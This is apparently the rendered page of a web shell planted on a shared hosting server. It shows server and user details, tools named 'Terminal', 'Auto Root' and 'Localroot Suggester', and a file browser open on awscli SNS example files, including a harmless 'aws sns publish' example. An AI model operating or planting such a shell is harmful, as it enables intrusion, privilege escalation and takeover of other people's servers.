Linux worldls-302.fr.planethoster.net 4.18.0-553.8.1.lve.el7h.x86_64 #1 SMP Thu Jul 4 15:19:33 UTC 2024 x86_64
LiteSpeed
Server IP : 10.185.0.203 & Your IP : 216.73.217.14
Domains :
Cant Read [ /etc/named.conf ]
User : gerathty
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python2.7 /
site-packages /
awscli /
examples /
sns /
Delete
Unzip
Name
Size
Permission
Date
Action
confirm-subscription.rst
651
B
-rw-r--r--
2017-04-04 16:39
create-topic.rst
587
B
-rw-r--r--
2017-04-04 16:39
delete-topic.rst
146
B
-rw-r--r--
2017-04-04 16:39
get-subscription-attributes.rst
758
B
-rw-r--r--
2017-04-04 16:39
get-topic-attributes.rst
1.27
KB
-rw-r--r--
2017-04-04 16:39
list-subscriptions-by-topic.rst
552
B
-rw-r--r--
2017-04-04 16:39
list-subscriptions.rst
484
B
-rw-r--r--
2017-04-04 16:39
list-topics.rst
220
B
-rw-r--r--
2017-04-04 16:39
publish.rst
353
B
-rw-r--r--
2017-04-04 16:39
subscribe.rst
270
B
-rw-r--r--
2017-04-04 16:39
unsubscribe.rst
173
B
-rw-r--r--
2017-04-04 16:39
Save
Rename
The following command publishes a message to an SNS topic named ``my-topic``:: aws sns publish --topic-arn "arn:aws:sns:us-west-2:0123456789012:my-topic" --message file://message.txt ``message.txt`` is a text file containing the message to publish:: Hello World Second Line Putting the message in a text file allows you to include line breaks.